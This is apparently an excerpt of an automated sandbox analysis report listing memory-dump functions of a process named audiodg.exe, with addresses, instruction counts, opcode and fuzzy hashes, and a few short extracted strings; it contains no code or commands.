Opcode ID: 501428448112c92942b8d51a047c7c464361a850b8b2a4bae300b069d73c82ea
Instruction ID: 39a5e2cc1006fbce02ac4cfa69d295fa5c59ba459cc45b15a369f57c9024cf72
Opcode Fuzzy Hash: 501428448112c92942b8d51a047c7c464361a850b8b2a4bae300b069d73c82ea
Instruction Fuzzy Hash: 4461CE30A1DA8A8FDB48EF1888545BA77E2FF99344F14457ED44AC7292DF34E882C785

Function 00007FF848F02C68 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7448ad020cc6a8322082d6d52362311d4184b9a2cafc733dd4b2ad5402ff5474
Instruction ID: a531ab074eb6d0f3d1fda886b60b5ef4311e9fb86b2969074f6a662cee422e0f
Opcode Fuzzy Hash: 7448ad020cc6a8322082d6d52362311d4184b9a2cafc733dd4b2ad5402ff5474
Instruction Fuzzy Hash: 4871AD3092D64A8FE741FB7888586B97BE0FF1A341F5149BAD409C71E2FB34A584CB04

Function 00007FF848F00610 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d905325bf751a0e9e86d78c15385ef18d371f7219a399bb448bb96899eb26f2c
Instruction ID: 78b71b8a450d1da1b5cc146ef12e00a3c706012360acd4c78149b0262ae84afc
Opcode Fuzzy Hash: d905325bf751a0e9e86d78c15385ef18d371f7219a399bb448bb96899eb26f2c
Instruction Fuzzy Hash: E461D13691E2169FE742BBB8E4885EA37A0FF45365F144677D088CA093EF3CA0458764

Function 00007FF848F027ED Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dba71aee5fa19b5bf304c76a858b375509c2f8ccd08dd2e9c0d970b05384e9a
Instruction ID: 7a320a75402451ddab8382a9611fba07c2cc6ce7c4a7a1aac3bd9d2e2fba7241
Opcode Fuzzy Hash: 3dba71aee5fa19b5bf304c76a858b375509c2f8ccd08dd2e9c0d970b05384e9a
Instruction Fuzzy Hash: 5151083691E2569FE342BBB8A8555EA3BB4FF42264F044677D088CE0D3EF3C504987A5

Function 00007FF848F0B0DA Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87024acaee4bf7f2432510d9e55c072280b6bb2e0f3a80d7e6e893ecdb2e62da
Instruction ID: a49f727aa8b8547bbfaacb9f3dd4fad9630efc4a5f3f8911c3d4e8e0b49fbbc3
Opcode Fuzzy Hash: 87024acaee4bf7f2432510d9e55c072280b6bb2e0f3a80d7e6e893ecdb2e62da
Instruction Fuzzy Hash: 7F517C30D0D79E8FEB95AB2888182EA7BF0FF15350F0415BAD448C71D2EB38A984C755

Function 00007FF848F01D69 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afee36ee7ac19bf4932ac5d4fdf60e4eca751841f6a699f14633a9d6712daa53
Instruction ID: ba4a9ef9f042d5fd7bd046ba56b5a2f93cbf221b626ecd66f847634671ad7499
Opcode Fuzzy Hash: afee36ee7ac19bf4932ac5d4fdf60e4eca751841f6a699f14633a9d6712daa53
Instruction Fuzzy Hash: FF418C31B18A5A8FDB4CEF1888955BA73E2FB98745F10453EE45AC3285DF30E8428B85

Function 00007FF848F02E09 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b124b27fcfdb67fcff42d34235a2c123794a482598bcc7bbd23ccccd89ca14af
Instruction ID: 94db617202e8959f169052403662b510c8c7f815ff6f1f6225f706632049a81a
Opcode Fuzzy Hash: b124b27fcfdb67fcff42d34235a2c123794a482598bcc7bbd23ccccd89ca14af
Instruction Fuzzy Hash: 50519230D5D28A8FE752ABB488582FA7BF0EF16381F0405BAD408C61D2FB78A548C765

Function 00007FF848F0B33D Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b4a3eb3ec048ade32ff5077b09ad5f043d8952aa45766d949301ade61fd70af
Instruction ID: c8b34af8eb44fc767aa448d18559632a8a6913e088132159e621106fb83cdfd4
Opcode Fuzzy Hash: 1b4a3eb3ec048ade32ff5077b09ad5f043d8952aa45766d949301ade61fd70af
Instruction Fuzzy Hash: 7E41EF71D1DA4A9FE741FB3888591EA7BE0FF5A351F1544B6C408CA0D2FF28A5458314

Function 00007FF848F00805 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11725b330c836a7462a50ad2d6b6b3703e0ad19286e94f2bb6625d2fa4dc8ed6
Instruction ID: 329e848a1ae50190663caf52c153ada24381ba20f2fa806ace4a237eb96e912f
Opcode Fuzzy Hash: 11725b330c836a7462a50ad2d6b6b3703e0ad19286e94f2bb6625d2fa4dc8ed6
Instruction Fuzzy Hash: 7C31053290E6869FE755B77898592E97BE0FF52358F0801B7D848CA0C3FE189459C399

Function 00007FF848F02E98 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39468ddcc15e5d5e70d43241949c11809b90e75fa7c01f395be6629e668e7430
Instruction ID: ca336bf4d13275afffe0fbb3ff11355d14944039e93090408c8a97906762f04a
Opcode Fuzzy Hash: 39468ddcc15e5d5e70d43241949c11809b90e75fa7c01f395be6629e668e7430
Instruction Fuzzy Hash: FC41B370D5D28A8FE752BBB488182FA7BE0EF06381F140576D408C61D6FF78A544C765

Function 00007FF848F01250 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e6ee96768f5c9bf0cef0b7c24543d52d5c6e4629116c5ce0ffd5a52fd41dad
Instruction ID: 7f7f0d89b33dab2b263f459920ba1c0b045fbd37869133d007c5fb5871daab81
Opcode Fuzzy Hash: 73e6ee96768f5c9bf0cef0b7c24543d52d5c6e4629116c5ce0ffd5a52fd41dad
Instruction Fuzzy Hash: 2D317C30D1DA5E8FEB98BF6888292FA77E0FF5A350F04057AD40AD21D1EF2864848755

Function 00007FF848F0AF0A Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afad24b43d5a841febf8d378c72872426684580891336b7ea42cfd2ae3ac7663
Instruction ID: 03bd4aeb95ecc043a810c432c8ddfa4a68f967f985180bde59570927a8ad993d
Opcode Fuzzy Hash: afad24b43d5a841febf8d378c72872426684580891336b7ea42cfd2ae3ac7663
Instruction Fuzzy Hash: CB31C33190E2494FD302EB6CD8955E97BA0EF8235AF0946B7C448CA197EB3864988795

Function 00007FF848F004F8 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fed2e172af82f88ee31d6afbea02235ae79a188a6b964456febf3ca7f7a561
Instruction ID: e2e3df34f99cd2556923eeee786865d13d80df759607d4ddb0aabfd8785ef915
Opcode Fuzzy Hash: e8fed2e172af82f88ee31d6afbea02235ae79a188a6b964456febf3ca7f7a561
Instruction Fuzzy Hash: 60317C3091D64E8FEB56FB6884586B97BE1FF1A341F5408BAD409C61E2EB34A594C720

Function 00007FF848F03294 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32c0c360a21f1b456bc2b107056de1a86abb125780d0181db92557db6212c964
Instruction ID: 60b9cf3b8074f3fe64af03a85f23b781f7fe3b384a46a587000c02f67283291d
Opcode Fuzzy Hash: 32c0c360a21f1b456bc2b107056de1a86abb125780d0181db92557db6212c964
Instruction Fuzzy Hash: 6221D270D0851D8FEB94EB98C894AECBBF1FF99341F10407AD00AE7295EB386944CB64

Function 00007FF848F012B6 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c934554eeae785847a29ec9864ae1611f15085443ee89164ff76aafcb5e740e
Instruction ID: 3ced2d99b109bbc7deb95f296bf0b8300b1bec477328e430c1912916e48118b3
Opcode Fuzzy Hash: 2c934554eeae785847a29ec9864ae1611f15085443ee89164ff76aafcb5e740e
Instruction Fuzzy Hash: 45115930D1DA4E8FEB49EB6488292FAB7E1FF59340F00047AD40AD35D2EF69A8408795

Function 00007FF848F02709 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee99380bc2e6219c63429c5897444cee9ba5fd8cff58589e61e5941436a83966
Instruction ID: 552ee08ea301f486ee35dea78945491799b1280ef55970374149344e3fdd9429
Opcode Fuzzy Hash: ee99380bc2e6219c63429c5897444cee9ba5fd8cff58589e61e5941436a83966
Instruction Fuzzy Hash: 94215E3180E7CA8FEB57AF7488592A93FA1FF16341F4504BAD808C61E3EB78A558C751

Function 00007FF848F005D8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42215c00b8b255df1b395437f48480a022cd4bc1a19bc92861848f2b894dab4a
Instruction ID: d5467d02be1b4f3111daff805b4694cc5fced3506b73226351b8dbd2a341aaa4
Opcode Fuzzy Hash: 42215c00b8b255df1b395437f48480a022cd4bc1a19bc92861848f2b894dab4a
Instruction Fuzzy Hash: CC11CE3080DA8E8FDB49EF2488696BA7BE1FF5A341F1044BED409C71D2EB35A584CB05

Function 00007FF848F00FA7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2460182bb3526a2d43918bba3e703d9dd5d94bd5c97e49a38c6d734ac8c9fa4a
Instruction ID: cd2456f5e8f5563df2e7af0f1b8ed66c1f6811f38852daea710c68d942d8909a
Opcode Fuzzy Hash: 2460182bb3526a2d43918bba3e703d9dd5d94bd5c97e49a38c6d734ac8c9fa4a
Instruction Fuzzy Hash: F801E830D096198FEB50FB64C8447EDB7F0EB55345F1082AAD409E72C6EF386A848F58

Function 00007FF848F02450 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d504cb188f9ac6bd6aa3c5d1fa74d503509be9ba1b11a552a60728ede4745a7
Instruction ID: 2361854fd98705c938a907012ce1a6afbc10bdb1affbaf07f76b24a813a0d84c
Opcode Fuzzy Hash: 3d504cb188f9ac6bd6aa3c5d1fa74d503509be9ba1b11a552a60728ede4745a7
Instruction Fuzzy Hash: 8AF0C474D085298EEBA0FF20C885BE8B3B1AB55345F1041FAD40DD62D2EF786A98CF55

Function 00007FF848F00608 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a0746f0750a9d29afcb035d9baecf139fda2ed1dee9630ac70de0476edd304
Instruction ID: 33f6ec6e2efcab817624ef7bac8aba64e8ed2e18dcb5c90c67f01c3a04fec2a9
Opcode Fuzzy Hash: e7a0746f0750a9d29afcb035d9baecf139fda2ed1dee9630ac70de0476edd304
Instruction Fuzzy Hash: A3F06D3081D74E9EEB5AAF6484082BE72A5FF06345F40083AE81EC11C2EF38A5A4C655

Function 00007FF848F02788 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0de825b55b7e916c5df61402b41a518b02dafea4b402c5d37d5929fac1f2020
Instruction ID: f2fd98767f8431f1d6c6ed931d4ee05ee8855a528b4a76f0d8d14f032cb0d2af
Opcode Fuzzy Hash: a0de825b55b7e916c5df61402b41a518b02dafea4b402c5d37d5929fac1f2020
Instruction Fuzzy Hash: D5F08C3081D68E8EEB5AAB6488192FA3AA1FF16345F40087AE819C11C2EF38A5948641

Function 00007FF848F00FFB Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4300470b5a22cbdca3d8fc0818a7f379ac0f7646b4d0ed5cf057fff42a11e3b
Instruction ID: 7c1e39166075e3b7435b457d42343a57fcd7a99c6fa2e321916dcf2db0032f0c
Opcode Fuzzy Hash: b4300470b5a22cbdca3d8fc0818a7f379ac0f7646b4d0ed5cf057fff42a11e3b
Instruction Fuzzy Hash:

Function 00007FF848F0B265 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbef73b19a244de7bdc9c13ff265040d88bef9467c4155a189b2ae387251d124
Instruction ID: 9418ff6cdf441dd4b8061262c183349f8ee586849d0d30cc4b59f0d1d91ae02d
Opcode Fuzzy Hash: fbef73b19a244de7bdc9c13ff265040d88bef9467c4155a189b2ae387251d124
Instruction Fuzzy Hash:

Non-executed Functions

Function 00007FF848F0387E Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

0t]I, xrefs: 00007FF848F03944
.t]I, xrefs: 00007FF848F03954
/t]I, xrefs: 00007FF848F03924
8t], xrefs: 00007FF848F038D4

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID: .t]I$/t]I$0t]I$8t]
API String ID: 0-2795108176
Opcode ID: 9d00c4c613a585b2c9fac6b3ea1730ab7258ecca924e4a973fa47da876a00340
Instruction ID: 58299233f7c6bfa55b7fa0f2e1c08e9065f95a5f0312ea67898dbbb1d82934b8
Opcode Fuzzy Hash: 9d00c4c613a585b2c9fac6b3ea1730ab7258ecca924e4a973fa47da876a00340
Instruction Fuzzy Hash: B431AE6281E3D25FE3135BB81C289757FA5EF63A50B1941FBC184CB0EBE509990AC362

Function 00007FF848F038B8 Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

0t]I, xrefs: 00007FF848F03944
.t]I, xrefs: 00007FF848F03954
/t]I, xrefs: 00007FF848F03924
8t], xrefs: 00007FF848F038D4

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID: .t]I$/t]I$0t]I$8t]
API String ID: 0-2795108176
Opcode ID: 599611ec0b051e55d6db15417e7b80c312b563959963be89555e7111823473b0
Instruction ID: afeca296273067539e1e1617d75720b9d9bee4d5e606f73339f6e58e157926d2
Opcode Fuzzy Hash: 599611ec0b051e55d6db15417e7b80c312b563959963be89555e7111823473b0
Instruction Fuzzy Hash: 0721F463C1E6D25FE3125BBC1818538AF90EF63B50B5845FFC2889B0DBE518990D8396

Analysis Process: audiodg.exePID: 6768, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F13565 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02f3ee2631536f025b09e19151aaf3a517a4452dcd00c1d7e782f30973479c93
Instruction ID: c2772ae5ef64905824c8f8447401166545c9ebb431d71ea85c0b41cabf586d42
Opcode Fuzzy Hash: 02f3ee2631536f025b09e19151aaf3a517a4452dcd00c1d7e782f30973479c93
Instruction Fuzzy Hash: 9091AD31E1C94A8FEB88EB6CD8287A9BBE1FB99354F50017AD009D32C6DF6828058755

Function 00007FF848F21440 Relevance: 2.6, Strings: 2, Instructions: 51COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F214A9
., xrefs: 00007FF848F2145A

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f21000_audiodg.jbxd

Similarity

API ID:
String ID: .$/
API String ID: 0-2544594439
Opcode ID: 16383b859d1b7c5c4d76347344f7f166bb52e966c7ee8a2b71f08dd1aa6e75ca
Instruction ID: ca6366f6258a29278b5685ac77a7967be32ab20892f174bc685c6e667dd6ffc1
Opcode Fuzzy Hash: 16383b859d1b7c5c4d76347344f7f166bb52e966c7ee8a2b71f08dd1aa6e75ca
Instruction Fuzzy Hash: 32115A35E09319CFDB25DF94D8547EDB3B1EF41350F2042AAD00D9B291DB796A98CB48

Function 00007FF848F1CCCD Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

%{w, xrefs: 00007FF848F1CD3E

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID: %{w
API String ID: 0-3323597317
Opcode ID: 63fc44a28d183dd1c9c797dda47dcb4a6339a322113ac4c3d1039d7ea44d8d4e
Instruction ID: 554555a9c755bf78377ca1adb4a080d81a88d96d7fe0975315078a77dd465d13
Opcode Fuzzy Hash: 63fc44a28d183dd1c9c797dda47dcb4a6339a322113ac4c3d1039d7ea44d8d4e
Instruction Fuzzy Hash: E651E337A1DA76AEE7507B6CB8051EA7760FF813B5F144237D64CCA082EB18784587D8

Function 00007FF848F10A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F10A70

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: 0e9ae1cf642703d5a12c6c453c79e1a0795b9ecd2431da73fb9d9dd9666b3839
Instruction ID: 1189ac619cb8187913d852640065c2bfdac3f2e42b12e05bfaf0a5481121b63b
Opcode Fuzzy Hash: 0e9ae1cf642703d5a12c6c453c79e1a0795b9ecd2431da73fb9d9dd9666b3839
Instruction Fuzzy Hash: 20116A31D0C95E9EE780FB68D8492B97BE0FFA8380F4405B6D809C6192EF38A9448700

Function 00007FF848F1123D Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F112AD

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: bd246b3b40616cd5806456f5f5e4b936573ee432c1c68bf2cb75c85d8f2fdafa
Instruction ID: 59e420d3da0b8648ff7755b34c14c5f12d1bc2c2f64e90152eb5d66d88cb7bb2
Opcode Fuzzy Hash: bd246b3b40616cd5806456f5f5e4b936573ee432c1c68bf2cb75c85d8f2fdafa
Instruction Fuzzy Hash: 9B11B230D0D59E8EEB99FB6884596B97BE0FF66341F4415BAD00AC60D2EF255884C714

Function 00007FF848F11250 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F112AD

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 243f765abfc68f60622a4337f7c55dc0b0d13763b109342c98656871fc129ce7
Instruction ID: 3a0628975e96b354667c55ebd7b7a3e137eebbf65dd67573b3df0e1becedb54f
Opcode Fuzzy Hash: 243f765abfc68f60622a4337f7c55dc0b0d13763b109342c98656871fc129ce7
Instruction Fuzzy Hash: 99F0AF30E1D5AF8EEBD8BB6898183BA77E4FF56355F04153AD40DC20D2EF2818948224

Function 00007FF848F1FD2D Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F1FD4B

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f1f000_audiodg.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: abfaca1340e5fa52885e9b5c6a494372cc09fb373e3e002210ee3d8dff2d3142
Instruction ID: fe5cdac75f3527651820c48d035ab2d08895516b2c2bd5ddece7d42f25c66895
Opcode Fuzzy Hash: abfaca1340e5fa52885e9b5c6a494372cc09fb373e3e002210ee3d8dff2d3142
Instruction Fuzzy Hash: 1CD0CE70D1855D8FDBA4EF14C4557B976B1AB54340F1001BA950DE3291CF346E848F55

Function 00007FF848F105A0 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32f2b9b9df4d89e31faa4ea8fdfb6103af8d9e499e281a004824b94aa60f6f40
Instruction ID: 298ddd62e310dc013a843cf764dfe60cbfe7ff0485aec32817a906f8d915ca13
Opcode Fuzzy Hash: 32f2b9b9df4d89e31faa4ea8fdfb6103af8d9e499e281a004824b94aa60f6f40
Instruction Fuzzy Hash: 6991F423D0E5E29EE251777C78161F92BA0FFD27A4F0805B7D4888E0D7EE1C5C4A8299

Function 00007FF848F10638 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d228288eb849603df186133a5420770cb12d4518457507f1cfa59e071be3531b
Instruction ID: f38f12e3869879333271e81e1c1c296720e4ad5959461352f84d963cf5a24ce6
Opcode Fuzzy Hash: d228288eb849603df186133a5420770cb12d4518457507f1cfa59e071be3531b
Instruction Fuzzy Hash: E481F623D0E5E28EE255777C78151F92BA0FFD27A5F0805B7D4888A0D7DE2C5C4A8399

Function 00007FF848F10615 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2cf7a0e106d5b4dd047ab8490c1d1ad06cec1a70b4c4fbab411a34e543a9f2
Instruction ID: 9ddd905e94ad51cbb1d94078663ff3c194414c1186ca9e9c652ee012418b1213
Opcode Fuzzy Hash: ec2cf7a0e106d5b4dd047ab8490c1d1ad06cec1a70b4c4fbab411a34e543a9f2
Instruction Fuzzy Hash: F581F423D0E5E29EE255777C78151F92BA0FFD27A4F0805B7D4888E0D7EE2C5C4A8299

Function 00007FF848F105ED Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c7b3903d7c9eebae29ee6faf654ec3433551b3703b546c4fea7b37f3f791ad
